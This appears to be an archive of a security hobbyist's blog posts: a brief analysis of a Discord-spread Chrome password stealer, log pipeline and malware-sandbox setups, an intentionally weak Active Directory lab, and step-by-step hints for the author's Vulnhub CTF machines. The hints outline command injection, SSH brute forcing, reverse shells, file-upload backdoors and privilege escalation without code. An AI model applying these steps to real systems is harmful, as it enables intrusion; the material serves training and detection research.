Saturday, March 5, 2022

Quick analysis of stealer malware sent via discord

Introduction:

Just a quick analysis of malware sent via discord...

I got the malicious file from someone who received the file via Discord from a trusted account (which was compromised...)


Analysis:

Hash: 4f709e1c6951bbd65d03a9f44961e0ae

Original filename:Fruit_of_the_ace_v3.11.99.exe

The file looked like nodejs binary

pdb string: C:\Users\runneradmin\AppData\Local\Temp\pkg.3d5278e5642d39a96bc8ed09\node\out\Release\node.pdb


I started by analyzing the file locally but didn't get anywhere quickly so I moved to hatching triage for analysis.

Results: https://tria.ge/220220-wnqp3sbeh6


Here's the process list:


The executable drops and starts temp.ps1, which contains code to hide the window.


Once the window is hidden, it seems to download and execute MachineMania.exe which is a python executable file made with pyinstaller. Argument provided to the machinemania.exe during executing is a discord webhook.

Looking through Triage and file access I see the following:


It appears to be looking for applications listed above but I'm not sure if it actually does anything if the apps are installed.


Network traffic kinda looks like this:

It looks like there is a connection to OneDrive. I was pretty sure that's where the MachineMania.exe was being downloaded from but I didn't see much in the pcap or Triage output.

I went back to debugger and found the exact OneDrive link in the memory which is hosting MachineMania.exe



Looking at MachineMania.exe:

Hash: 725918a6ae94e864908946ebb5e98dee

This is pyinstaller file. 

I analyzed that file in Triage but I replaced discord webhook with webhook.site webhook

https://tria.ge/220220-ycs26scgdr/behavioral1

File interaction looks a bit different in analysis of this file. Unlike the original file, this file only looks at Chrome folder.



The webhook requests look kinda like this:



It appears to be only looking at Chrome. 


To further analyze the file, I started to decompile the pyinstaller file to see what it has inside of it.

I used this to extract the files: https://github.com/extremecoders-re/pyinstxtractor

I found the following files to be interesting


discordwebhook content looks like it's just doing POST request.

I wasn't able to get anything out of chrome.pyc file but it appears to be backed with pyarmor.


Additionally, while doing some analysis of the original file in debugger I also saw this:



I'm not really sure about what other capabilities the original file has. There is probably more but I mostly looked at the dropped pyinstaller/machinemania.exe file. I'm not sure about how nodejs code can be packed as executable.


Conclusion

Based on limited and quick analysis, it looks like compromised account will share the exe file.

original exe file will download and execute file from onedrive

onedrive file will steal data and send it to discord via webhook.

to me, the onedrive file only seems to be stealing chrome saved passwords and nothing else.


Similar sample: https://twitter.com/GlitchyPSI/status/1439674473515569154

https://www.virustotal.com/gui/file/60e75541c4b4130151fb2b80f04cd699ba0e66bf6c4ec364127e93a38dccefa9/relations

Check the Execution Parents. There are a lot of node binaries and filenames usually look like names of games.

Sunday, December 12, 2021

notes/links about log collection, storage, and searching

Introduction

Just some notes about log collection, storage, and searching.

I just want to be able to store some log data for a long time and do searches on it later in the future, once in a while. I'm not trying to produce a report with the data or do alerting or transport the logs securely.

One of my use cases is collecting network data and storing that for a long time and maybe searching for a specific domain or IP in the future that could've been related to a security incident. 

Similar for incoming http traffic. I'd like to see if someone tried to access a specific URI a really long time ago. (maybe when vuln related to that URI wasn't public at the time)

(leaving out elasticsearch-based things, splunk, and cloud-based services)

notes/links should help w/ research if anyone else is trying to do the same thing as me


Gathering & shipping logs:

For Windows Event Logs:

- fluentbit - https://docs.fluentbit.io/manual/pipeline/inputs/windows-event-log

- fluentd - https://docs.fluentd.org/input/windows_eventlog

- nxlog - https://nxlog.co/docs/nxlog-ce/nxlog-reference-manual.html#im_msvistalog

- winlogbeat - https://www.elastic.co/downloads/beats/winlogbeat-oss

- promtail - https://grafana.com/docs/loki/latest/clients/promtail/scraping/#windows-event-log


- Windows event forwarding - https://docs.microsoft.com/en-us/windows/security/threat-protection/use-windows-event-forwarding-to-assist-in-intrusion-detection WEF sends logs from all the hosts to one collector host

For other text file based logs (linux, webapp, etc..)

- all the tools above

- vector - https://vector.dev/components/

- filebeat - https://www.elastic.co/downloads/beats/filebeat-oss

- rsyslog - https://www.rsyslog.com/

- syslog-ng - https://www.syslog-ng.com/products/open-source-log-management/

- logstash - https://www.elastic.co/downloads/logstash-oss


some of the tools listed above can take in forwarded events (syslog, logtash/beats, etc) from other products and tools as well. 


- kafka - https://kafka.apache.org/ another option for just getting logs from various sources and forwarding them to some other place


input/output, sources/sinks:

- kafka - https://cwiki.apache.org/confluence/display/KAFKA/Ecosystem

- vector - https://vector.dev/components/

- fluentbit - https://docs.fluentbit.io/manual/pipeline/inputs 

https://docs.fluentbit.io/manual/pipeline/outputs

- fluentd - https://docs.fluentd.org/input

https://docs.fluentd.org/output

- logstash - https://www.elastic.co/guide/en/logstash/current/input-plugins.html

https://www.elastic.co/guide/en/logstash/current/output-plugins.html

- rsyslog - https://www.rsyslog.com/plugins/


Log processing:

You may want to process the data to drop certain events or append data to some events. For example, for network data, you may want to use a filter that adds geoip info. You may also want to rename fields.

Many of the collectors and shippers listed above already have some ability to modify or parse the log data. 

Some of the tools are calling these plugins/modules filter or processing or transformer. You may also be able to write your own plugins or some code (some tools above support Lua) to change the logs before output part happens.

Depending on the type of processing you may want to do, you may need to output the logs into a different format that your application understands then process it and put it back into the pipeline for the next step or storage.

For kafka, I found faust (https://faust.readthedocs.io/en/latest/) but there are other libraries too for python and other langs.


Log storage:

The output part in almost all the tools listed above can send data to various places where logs can be index and/or stored. 

You can always store logs to disk on one host w/ compression (obviously searching this is not very fun). Files can also be stored in the cloud. Everything pretty much has s3 output support.

For files stored on disk, many of the tools will allow you to select format such as text, json, etc..

Tools such as logrotate can be used to move, compress, or delete the logs (https://linux.die.net/man/8/logrotate)

cron job/scheduled tasks and some scripts can always be used to move, compress, or delete files as well. 

For being able to easily store and search logs, there is Grafana Loki - https://www.boredhackerblog.info/2021/11/collecting-unifi-logs-with-vector-and.html

Grafana Loki is somewhat similar to elasticsearch or splunk and you can use Grafana webui to query the data.

While doing more research, I came across clickhouse (which is also supported by some of the tools above) (https://clickhouse.com/) Clickhouse can store json data and you can do sql queries on that data. 

I also came across cloki, which is using clickhouse but emulating loki (https://github.com/lmangani/cloki)

The backend is a clickhouse database and you push logs into loki emulator, just like you'd push logs into loki. cloki also supports the same query language as loki and will work with grafana loki connector.


Log search:

Searching the logs depends on how they're stored obviously. For uncompressed or compressed logs, tools such as grep or zgrep or ripgrep (https://github.com/BurntSushi/ripgrep) can be used for searching.

On Windows, there are a few tools that can be used to search and/or query logs. Fileseek (https://www.fileseek.ca/) can be used to search a bunch of files. There is Logfusion (https://www.logfusion.ca/) as well which can be used to read log files.

There is also Log Parser Lizard (https://lizard-labs.com/log_parser_lizard.aspx) which can be used to query log files and even save queries and produce charts or reports.

Files can also be loaded into python w/ pandas for searches, complex searches, or statistical analysis. Pandas supports loading various file types. (https://pandas.pydata.org/docs/reference/io.html)

Finally, if you end up using loki or cloki, grafana can be used to do queries. Grafana also has connectors/plugins for other database/log storage systems. 


Sample logs:

To play with any of the tools above without making changes in production env, you can use sample logs or data sources.

https://github.com/logpai/loghub - github repo that links to several sample logs

https://www.secrepo.com/ - logs related to security. there are some network traffic logs in there

https://www.sec.gov/dera/data/edgar-log-file-data-set.html - EDGAR log files

https://log-sharing.dreamhosters.com/ - various log files

https://www.logs.to/ - log generator (various types)

https://github.com/mingrammer/flog - log generator

https://certstream.calidog.io/ - certificate transparency logs

http://www.hivemq.com/demos/websocket-client/ / broker.mqttdashboard.com - If you want to grab MQTT demo data. I'm pretty sure people are using this for free for their projects too...



ps: i'm not an engineer or an observability expert. Implementation of various tools above varies and may have impact on resource usage.

Friday, November 26, 2021

Collecting Unifi logs with Vector and Grafana Loki

Introduction

This post just discusses sending unifi logs to grafana loki and utilizing vector.dev/vector agent.

Typically for log collection I would utilize something like Beats (filebeat, winlogbeat) and Logstash. Logstash unfortunately, in my experience, uses too much memory and CPU resources so I decided to search for an alternative. I came across vector.dev, fluentd, and fluentbit. Vector.dev seemed to be easy to install, configure, and use so I decided to give that a try.  

For log storage and search, I would normally use Elasticsearch & Kibana, Opensearch, Graylog, or Humio. Humio would be hosted in the cloud and anything that's Elasticsearch or Elasticsearch-based would also require too much memory and CPU resources. I found Grafana Loki and decided to try that. It seems relatively lightweight for my needs and runs locally. Also I saw a Techno Tim video on Loki recently.

Logs will be stored with Loki and I'll use Grafana to connect to Loki and use it to query and display the data.

Vector and Grafana Loki will be running on a NUC w/ Celeron CPU w/ 4GB RAM so having something that runs on Pi (grafana has an article where they run grafana loki on a pi) is nice.

Design

Unifi controller has an option to send logs to a remote system so that's what I'll be using to send logs. It will send syslog (udp) to an IP address. 

Vector has sources, transforms, and sinks. Source is input/data source, transforms can apply various operations to the data, such as filtering or renaming fields, and sink is basically the output. I will be just using source and sink. Source in this case will be syslog. Vector will listen on a port for syslog messages. Sink will be Loki since that's where the logs will be stored.

I'll have one VM running vector and the same VM will be running Grafana UI and Loki using docker-compose.

Unifi Controller Syslog -> (syslog source) Vector (Loki sink) -> Loki <- Grafana WebUI

I am not using doing any encryption in transit or using authentication for loki, it is an option.

Setup

I have an Ubuntu 20.04 server w/ docker and docker-compose installed.

Grafana Loki

Grafana docker tutorial shows how to set up grafana loki with docker-compose: https://grafana.com/docs/loki/latest/installation/docker/ 

I removed promtail container from my configuration.

Here's the configuration I'm using:

https://gist.github.com/BoredHackerBlog/de8294818027d450ecc2aed9c94c5260

Create a new loki folder and grafana folder as docker will mount.

Download https://raw.githubusercontent.com/grafana/loki/v2.4.1/cmd/loki/loki-local-config.yaml and place it in loki folder and rename the file to local-config.yaml. Change the configuration if needed.

No need to download and place anything in the grafana folder.

Run docker-compose up -d to start grafana and loki.

Grafana webui is running on port 3000 and default creds are admin/admin.

Go to configuration and add loki as the data source. docker-compose file refers to that container as loki so it'll be at http://loki:3100.




Vector

Now Vector needs to be setup.

I'm setting it up by just following their quickstart guide.

I ran: curl --proto '=https' --tlsv1.2 -sSf https://sh.vector.dev | bash

Default config file is located at ~/.vector/config/vector.toml

Here's my config for syslog source and loki sink:

https://gist.github.com/BoredHackerBlog/de8294818027d450ecc2aed9c94c5260

I modified the syslog port to be 1514 so I can vector as a non-privileged user and I also changed mode to udp.

For loki sink, label is required but your label key value can be anything you prefer. I could have done labels.system = "unifi" and it would work just fine.

Once configuration is done, the following command can be ran to start vector: vector --config ~/.vector/config/vector.toml

Unifi controller

In unifi controller settings, remote logging option is under Settings -> System -> Application Configuration -> Remote Logging

Here's what my configuration looks like:

Click Apply to apply changes and the logs should flow to vector and into loki.




!!!

no logs in grafana query

I did have a weird issue where logs didnt show up in grafana query but would show up when i do live query.

I ran "sudo timedatectl set-timezone America/New_York" to update my timezone and that fixed the issue. (or it didn't but i think it did because queries did show results after i ran this)

!!!

Saturday, April 10, 2021

Creating a malware sandbox for sysmon and windows event logs with virtualbox and vmexec

Introduction

I was doing some research around detection related to maldoc/initial access. Usually, I've seen malicious Word or Excel documents and in some cases compressed files containing Word document, Excel document, script, or an executable. In a lot of cases LOLBIN/LOLBAS are abused. You can see this this happening a lot of sandbox (anyrun, VT dynamic, hatching triage, etc..) outputs as well.

I came across some guidance around blocking some LOLBIN/LOLBAS files with Windows Firewall to prevent some of the initial compromise activity. There multiple scripts and blog posts related to this. Essentially, Windows Firewall rules are added to prevent some of the executables from connecting to the internet.

Scripts/Blogs:

https://daniel.streefkerkonline.com/2017/10/24/mitigate-commodity-malware-attacks-with-windows-firewall-rules/

https://call4cloud.nl/2020/07/the-windows-firewall-rises/

https://gist.github.com/ricardojba/ecdfe30dadbdab6c514a530bc5d51ef6#file-windows_hardening-cmd-L497

https://gist.github.com/jaredhaight/e88b4323adce06395dace501841d3075#file-windows_hardening-cmd-L108


I also saw posts where Olaf Hartong was discussing data from sandbox related to malware and LOLBIN/LOLBAS usage and rundll32 as well.

https://twitter.com/olafhartong/status/1359235339332780034

https://twitter.com/olafhartong/status/1361415502447267842


I thought it would be interesting to collect data on my own and have my own dataset to play with. I also wanted the ability to test malware in an environment where some hardening was applied, such as mentioned in the blog posts and scripts above. In addition to that, I wanted to have the ability to have an EDR agent or AV agent in the same sandbox to see what it collects or alerts on in it's management console. I ended up writing vmexec to help me with this.

vmexec is similar to cuckoo sandbox and cape sandbox but it doesn't get any information back from the VM's. It just puts the executable in the VM and executes it. When you upload the sample, you can pick a VM or use any available VM and set how long the VM will run for after the sample is uploaded. It uses virtualbox for VM's and just like cuckoo or cape, you need to have an agent inside the VM.

https://github.com/BoredHackerBlog/vmexec


Design

I'll be using Windows 10 VM with various logging enabled and sysmon installed. I'm using sysmon-module rules (https://github.com/olafhartong/sysmon-modular). 

For forwarding logs, I'll be using winlogbeat OSS. (https://www.elastic.co/downloads/beats/winlogbeat-oss) I'm using OSS version because I'll be using Opendistro for elasticsearch elastic and kibana containers. (https://opendistro.github.io/for-elasticsearch/)

Since I'll be running malware, I'll have to have a second VM for routing the malicious traffic but it's not required if you're okay with threat actors potentially seeing your connections. You can always set up the sandbox VM in a way it doesn't route any traffic as well.

The network and VM design kinda looks like this:



Setup

Getting all the packages and dependencies:

  1. Install Ubuntu 20.04 (although pretty much any Linux OS should work)
  2. Install Docker (https://get.docker.com/)
  3. Install docker-compose (https://docs.docker.com/compose/install/)
  4. Install Virtualbox (https://linuxize.com/post/how-to-install-virtualbox-on-ubuntu-20-04/)
  5. Make sure python3 and python3-pip are installed
    1. Might have to run apt install python3 python3-pip
  6. Install python packages
    1. Run the commands below:
      1. pip3 install flask
      2. pip3 install flask-sqlalchemy
      3. pip3 install flask-admin
  7. Download vmexec https://github.com/BoredHackerBlog/vmexec
    1. if you have git installed you can run:
      1. git clone https://github.com/BoredHackerBlog/vmexec

Getting Elastic and Kibana up and running:

I'm using a docker-compose file for elastic and kibana. 

research@workstation13:~/elk$ cat docker-compose.yml

version: '3'

services:

  odfe-node1:

    image: amazon/opendistro-for-elasticsearch:1.13.1

    container_name: odfe-node1

    environment:

      - discovery.type=single-node

      - bootstrap.memory_lock=true # along with the memlock settings below, disables swapping

      - "ES_JAVA_OPTS=-Xms512m -Xmx512m" # minimum and maximum Java heap size, recommend setting both to 50% of system RAM

    ulimits:

      memlock:

        soft: -1

        hard: -1

      nofile:

        soft: 65536 # maximum number of open files for the Elasticsearch user, set to at least 65536 on modern systems

        hard: 65536

    volumes:

      - odfe-data1:/usr/share/elasticsearch/data

    ports:

      - 9200:9200

    networks:

      - odfe-net

  kibana:

    image: amazon/opendistro-for-elasticsearch-kibana:1.13.1

    container_name: odfe-kibana

    ports:

      - 5601:5601

    expose:

      - "5601"

    environment:

      ELASTICSEARCH_URL: https://odfe-node1:9200

      ELASTICSEARCH_HOSTS: https://odfe-node1:9200

    networks:

      - odfe-net


volumes:

  odfe-data1:


networks:

  odfe-net:


In the docker-compose.yml file shown above, the data is being stored in odfe-data1 volume. When you take down the containers and bring them up again, the data will not go away. 

Additional information about opendistro for elastic docker container and settings can be found here: https://opendistro.github.io/for-elasticsearch-docs/docs/install/docker/

Cd into the directory that contains the docker-compose.yml file and run docker-compose up -d to start containers in the background. To take down the containers, you can run docker-compose down from the same directory.

Once you bring up the containers, elastic will be running on port 9200 and kibana will be on 5601.


Setting up Windows 10 Sandbox

  1. Create a Windows 10 VM in virtualbox
  2. Disable updates
  3. Disable antivirus
  4. Disable UAC
  5. Disable anything else that's not needed
  6. Install whatever applications you need, such as a pdf reader or Office
    1. If you're using Office (Word or Excel), ensure to allow macros to run automatically (https://support.microsoft.com/en-us/topic/enable-or-disable-macros-in-office-files-12b036fd-d140-4e74-b45e-16fed1a7e5c6)
  7. Install Python 3+
  8. Copy agent.py from vmexec project into the VM (do not run it yet)
These should help with disabling of some things: https://github.com/BoredHackerBlog/LogDetectionLab/blob/main/change_sec_config.bat

https://github.com/BoredHackerBlog/loggingstuff/blob/main/loggingstuff.bat

Setting up logging and log forwarding:
  1. Download sysmon and install Sysmon with sysmon-module rules (see the loggingstuff.bat link above)
  2. Enable process auditing and powershell logging (https://redblueteam.wordpress.com/2020/02/08/enable-command-line-and-powershell-audit-for-better-threat-hunting/)
  3. Download and install winlogbeat oss
    1. configure winlogbeat oss to forward logs to 192.168.56.1, which is where elastic will be running once we create host-only adapter


After the base VM is setup, there are some network modifications that are needed.

You will need to create a host-only adapter without dhcp server enabled.

Enable the second NIC on the VM and attach it to host-only adapter.

Set the first NIC/adapter to NAT or internal network or whatever else. I have mine setup to internal network going to my router.

Finally, turn on the VM, set a static IP for the adapter in Windows. Since my vboxnet0 host-only adapter is using 192.168.56.1/1 I set my IP to 192.168.56.2.

Reboot the VM, login and run agent.py and take a snapshot while the VM is running. Note the IP address, snapshot name, and VM name.

Setting up vmexec
in app.py, just search for #CHANGEME and modify the settings there.

You'll want to add your VM like this:

db.session.add(VMStatus(name="winVM",ip="10.0.0.178",snapshot="Snapshot2", available=True))

name is the name you gave your VM in virtualbox, IP is the static IP that was assigned, and snapshot is the snapshot you're utilizing.


Usage

To start using vmexec, you need the docker containers for elastic and kibana running (cd into the directory with your docker-compose.yml file and type docker-compose up -d), you need your router VM up and running. You can just start the VM. Finally, you need to start vmexec. cd into the vmexec directory and type flask run -h 0.0.0.0 (if you want to remotely access the web server) the web server will be running on port 5000.

the webui looks like this:


You can select and upload a file, select a specific VM from the dropdown menu (optional), and change the VM run time and click the submit button.


You can access kibana on port 5601 via web browser. Make sure to setup your index pattern. It should be winlogbeat-*.


In kibana you can search for the executable file that was ran and look at surrounding events. With sysmon-modular rules, you can also match events with mitre framework.




Modifying the project

Modifying the project is easy depending on your needs. Agent.py can be modified easily if you would like to upload files to specific location or execute/open them in a certain way. There could be code added in vm_process function as well if additional steps need to be taken before running the VM or the file or after.


Resources

https://cuckoosandbox.org/

https://github.com/kevoreilly/CAPEv2

https://github.com/BoredHackerBlog/capev2-virtualbox-install

https://github.com/BoredHackerBlog/vmexec

https://www.docker.com/

https://opendistro.github.io/for-elasticsearch/

https://www.elastic.co/downloads/beats/winlogbeat-oss

https://github.com/olafhartong/sysmon-modular

https://www.virtualbox.org/



Saturday, January 30, 2021

Creating an Active Directory (AD) lab for log-based detection research and development with Vagrant, Humio, and AtomicRedTeam

introduction

Few years or months ago, I came across DetectionLab project and thought it was neat. It would let me conduct attacks and let me work on detection rules and also let me test detection rules. DetectionLab uses Splunk for storing logs which I'm not used to and it also requires a lot of system resources my machine doesn't have. 

I then came across DetectionLabELK, which is similar to DetectionLab but uses ELK stack, which I am familiar with but I have the same issue with system requirements and not needing some of the components of the project. DetectionLabELK people (CyberDefenders) provide a cloud version of it which is very cheap if you wanted to utilize it for testing things but I still wanted to have something on my own machine.

I did build an AD lab manually, however, after not taking snapshots and breaking the lab, I decided that I should just use Vagrant.

For my lab needs, I just need to look at logs and not network traffic. I also just need one DC, one Workstation, and a Kali VM. I'm very familiar with using Humio so I decided to use Humio cloud (free) account to store and search my logs. Kali is good for doing certain attacks but I also wanted AtomicRedTeam so I could use that for generating log data and testing queries. The AD lab I made was also inspired by Applied Purple Teaming course and TheCyberMentor ethical hacking course.

design

Domain: testlab.local
Computers: dc1 - 192.168.200.11 - windows server 2019 desktop
workstation1 - 192.168.200.12 - windows 10
kali - no IP initially, you have to set it to 192.168.200.13 - kali linux

Users:
local user: vagrant / vagrant works on all machines
domain users: 
jsmith / Password123
jdoe / 123Password
SQLService / Servicepass123

all domain users are in domain admins group, administrators group, and enterprise admins group.

jsmith is a local admin on workstation1

setup

system requirements:
any modern 4 core 8 thread CPU should be fine. I'm using i7-6700HQ.
around 16GB of RAM should work fine as well.

virtualbox download and installation:
Download and install virtualbox from here: https://www.virtualbox.org/wiki/Downloads
Install Oracle VM VirtualBox Extension Pack as well.

vagrant download and installation:
Download and install vagrant from here: https://www.vagrantup.com/downloads
Once vagrant is installed, open command line and run: "vagrant plugin install vagrant-reload" to install the reload plugin. More info here: https://github.com/aidanns/vagrant-reload

downloading the github project:
Download the zip and unzip it or run git clone https://github.com/BoredHackerBlog/LogDetectionLab

setting up humio:
Get a Humio account and login at cloud.humio.com
Create a new token for this project. You can leave the parser as None. Copy the token.
Edit winlogbeat.yml file and change the password to your token.

usage

Vagrant command line guide: https://www.vagrantup.com/docs/cli

Open command prompt and cd into the LogDetectionLab folder.
Type vagrant up to bring up all 3 virtual machines.
Your initial run will download the VM boxes and set everything up. This may take 30 minutes to an hour. 

Once all the machines are up and running and vagrant command exits in command prompt, you will need to login into kali linux VM and change eth1 IP to 192.168.200.13.

You will have to disable Defender on workstation1 and install invoke-atomicredteam manually (check github page for bugs).

For using invoke-atomicredteam, you will need to open powershell and run: Import-Module "C:\AtomicRedTeam\invoke-atomicredteam\Invoke-AtomicRedTeam.psd1" -Force

You can also do vagrant up MACHINENAME, such as vagrant up dc1.

To tear down the lab, you need to run vagrant destroy -f. This will shutdown the VMs and remove them.

Vagrant also supports making snapshots and you can read more about that here: https://www.vagrantup.com/docs/cli/snapshot

modifying the project

Vagrantfile - this can be changed to modify VM cpu and memory resources, how port forwarding works, hostname, ip address, and scripts that run.

install-dc.ps1 - domain controller promotion script

join-domain.ps1 - joins the computer to the domain and adds jsmith as a local admin

create-users.ps1 - creates users on the dc

create-smbshare.ps1 - create an smb share on the dc

change_ui.ps1 - changes some Windows setting so ui is adjusted to best performance

change_sec_config.bat - disable updates, disable firewall, disable defender, disable uac, and enable rdp

install-atomicredteam.ps1 - installs invoke-atomicredteam

enable_logging.bat - enables a bunch of logging stuff, installs sysmon with olafhartong config, and downloads winlogbeat

winlogbeat.yml - winlogbeat config file, you'll have to edit this to change where the logs go also as you start seeing event id's that are not useful, you can just edit this to remove them or modify enable_logging.bat to avoid enabling certain events.

setup_winlogbeat.bat - sets up winlogbeat

challenges

I kept getting errors after I promoted the domain controller then tried to reboot. Errors were related to winrm. I added 
  config.winrm.transport = :plaintext
  config.winrm.basic_auth_only = true

and

executed "reg add HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /d 0 /t REG_DWORD /f /reg:64" before promoting and that seemed to fix this issue.

At the time of posting this blog post, I'm having an issue with workstation1 not installing atomicredteam correctly. AV doesn't get turned off for some reason.

I can't change IP address on kali through vagrant. 

me typing vagrant destory -f for 10 minutes trying to figure out why it didn't work was also challenging. 

resources


Sunday, July 5, 2020

Openfaas and infosec uses

OpenFaaS:

OpenFaaS is a function as a service project that can be self-hosted, much like AWS Lambda or Google Functions. Essentially, instead of writing a full project that does various things, you write and maintain functions instead. OpenFaaS can be deployed with Docker Swarm, Kubernetes, and OpenShift.

OpenFaaS documentation is pretty clean and easy to understand. To use it, you need either Docker Swarm, Kubernetes, or OpenShift. Once you deploy OpenFaaS, you need to create a function and deploy it. There are several ways to supply data to the function, one of them is via http requests.

You can use function in sync or async way, without modifying any code at all. You just modify the URL you're sending the http requests too. In addition to that, OpenFaaS will do scaling on its own. If you're using a function a lot and OpenFaaS will spin up containers for that specific function automatically. It's also possible to utilize ci/cd with OpenFaaS to ensure that deploying changes to functions is easy and quick.

I've been mainly experimenting with OpenFaaS on Vultr but it's also possible to play with it in Docker Playground.

Infosec use cases:

I looked through some of my past projects and I can see myself using OpenFaaS if I were to rewrite them. For example, file analysis. It is possible to combine OpenFaaS with other technologies such as Redis (to keep track of operations) and Minio (to allow download/upload of files/artifacts inside of functions) to analyze malicious files or extract metadata from files. In addition to this, you can also implement machine learning and analyze features of a bunch of PE files in a function and return info about if they are malicious or not.

Another use case is analyzing phishing links. I wrote a golang project that takes links from phishtank and splits them into more URLs recursively and checks each URL to see if there is an open directory. It's possible to completely implement this with OpenFaaS. For example, you can send phishtank data to OpenFaaS function every 8 hours and split each link into multiple URLs, send URLs to another function to detect open directory, finally send the URLs that have open directory to another function that downloads files (this would be phishing kit zip files in most cases) from the open directory.

Log analysis or enrichment is another use case. For example, if you were receiving logs about remote sign-ins, you could send the logs in batches or individually to a function or functions to extract IP and do log enrichment based on API lookups for the IP or finding geolocation.

OpenFaaS can be useful for doing analysis of forensic artifacts. If you're working an incident and need to analyze artifacts from hundreds of computers, you can collect the evidence, throw it in Minio, have a bunch of functions to analyze the evidence, maybe even send the output to another set of functions for enrichment before sending the final evidence to storage or SIEM.



I discovered the OpenFaaS project earlier this month and it has been fun to play with and I can see myself using it a lot. Being able to deploy and maintain specific functions instead of a huge application is much easier for me. Also not having to write code that's threaded and OpenFaaS doing automated scaling is very nice.

Links:

https://www.openfaas.com/
https://docs.openfaas.com/deployment/
https://docs.openfaas.com/reference/triggers/
https://docs.openfaas.com/reference/async/
https://docs.openfaas.com/reference/cicd/intro/
https://www.vultr.com/docs/deploying-openfaas-using-docker-swarm
https://docs.openfaas.com/deployment/play-with-docker/
https://redis.io/
https://min.io/
https://www.phishtank.com/
https://blog.alexellis.io/openfaas-storage-for-your-functions/
https://youtu.be/XiagsmRVoNY

https://www.vultr.com/?ref=7127410 (Affiliate link...)

Saturday, April 25, 2020

Vulnhub VMs and guide/hints

I released some VM's on Vulnhub almost a month ago.


This post has guide/hints for those VM's.

Cloud Antivirus/Cloud AV:
1. Start by port scanning your network and locate the Easy Cloud AV VM’s IP address.
a. Port 22 and 8080 should be open and the MAC address should be: 08:00:27:BA:A5:BA
2. Do an Aggressive nmap scan on the target IP address and find out what services are running.
3. Visit the web server running on the target IP
4. You were not provided an Invite code. Bypass the Invite code page.
a. Input data in the invite form field to cause an error on the web server
b. Read the error messages and craft input to bypass the invite code page
5. Get command line injection on the scanner page
a. Based on scanner output, determine what the input could have been
b. Inject your own commands
c. To make sure command execution works, cat /etc/hostname
i. Output from it will be “cloudav”
6. Gather information about the users
a. View linux files that could contain user information
7. Brute force port 22/SSH
a. Use the gathered usernames to build a list of usernames and passwords
b. Use the list for brute forcing port 22/SSH
8. Examine home directory of users and exploit vulnerable application to get root
a. Examine the left behind source code
b. Determine how to inject commands
c. Inject commands to gain root privileges!

Socnet/social network:
Goal: Get root privilege on the machine (hostname: socnet)
1. Start by port scanning. Locate socnet VM’s IP address.
a. Port 22 and 5000 should be open. Mac address should be: 08:00:27:A6:E2:EC
2. Do an aggressive nmap scan on the target IP and find out which services are running
3. Visit the webpage on the target IP
a. Examine it for any vulnerabilities
4. Use dirb to scan the website for hidden pages
5. Use the input on the hidden page to test code
a. https://www.geeksforgeeks.org/exec-in-python/
b. Try Python’s time.sleep module and see if website will take sleep and take longer to
respond. Try 5 second sleep then 10 second sleep to observe different response times.
6. Abuse to the code testing functionality to get a reverse shell
a. http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
7. Setup a more stable reverse shell with meterpreter
a. https://netsec.ws/?p=331
b. Create the reverse shell binary
c. Transfer the binary to target machine using a webserver on the attacker machine and
running wget on the target machine
d. Use metasploit to handle meterpreter reverse shell
8. Utilize the ‘arp’ command in meterpreter to look for other machines on the target network
9. Utilize the ‘ifconfig’ command in meterpreter to get targets network information
10. Using metasploit, setup a route via meterpreter session
11. Utilize auxiliary/scanner/portscan/tcp to scan other machines on the target network
12. Google open ports and find out what they’re used for
13. Utilize meterpreter session to do port forwarding from your local machine to the machine with
port 9200 open
14. Utilize curl and query machine with port 9200 open and find what’s running on it, including any
version numbers
15. Exploit the service running on port 9200
a. Search for an exploit that works against version of service running on 9200
b. Utilize the exploit and gain shell access
c. Examine / directory for interesting files
16. Utilize passwords file collected from machine with port 9200 open, crack the passwords, and
build a username and password list
a. https://crackstation.net/
17. Attack SSH running on the target machine with the username and password list
18. After logging in successfully on the target machine via SSH, gather machine information
a. Get OS info
b. Get kernel info
c. Arch info (64bit or 32bit)
19. Use privesc exploit to get root privs
a. Utilize collected info to search for privesc exploits
b. Compile the privesc exploits and transfer the compiled files to target system using SCP
c. Execute the exploits to finally get root privs

Socnet2/social network 2:
Goal: Get root privilege on the machine
1. Start by port scanning and locating socnet2 VM.
a. Port 22, 80, and 8000 should be open. Mac address should be: 08:00:27:e9:e5:e6
2. Do an aggressive nmap scan and find more information about the services running
3. Visit webservers
4. Visit webserver on port 80 and examine it
a. Sign up
b. Explore the site
c. Look for any issues
5. Get a backdoor on the webserver
a. Utilize file upload functionality to get a backdoor on the webserver
b. Run the backdoor
6. Utilized the backdoor to find more information about whats running on port 8000
a. Examine the file system, processes
b. Be sure to read social network posts as well
7. Abuse the service running on port 8000 to get another shell
a. Examine the source code for the service running on port 8000
b. Write a custom tool/script to gain shell through service running on port 8000
i. https://docs.python.org/2/library/xmlrpclib.html
8. Load a meterpreter backdoor on the victim machine and utilize it to examine files in the users
directory
9. Write an exploit for SUID binary
a. Find the SUID binary in the user folder
b. Binary includes a backdoor function
i. https://github.com/radareorg/cutter
c. Download the binary, use a debugger, and different inputs to trigger a crash and control
the EIP
d. Create a working exploit that launches backdoor function
10. Put the exploit on victim machine and exploit the SUID binary to get root

Moriarty Corp:
Goal: Get all the flags

No guide or hints. Sorry.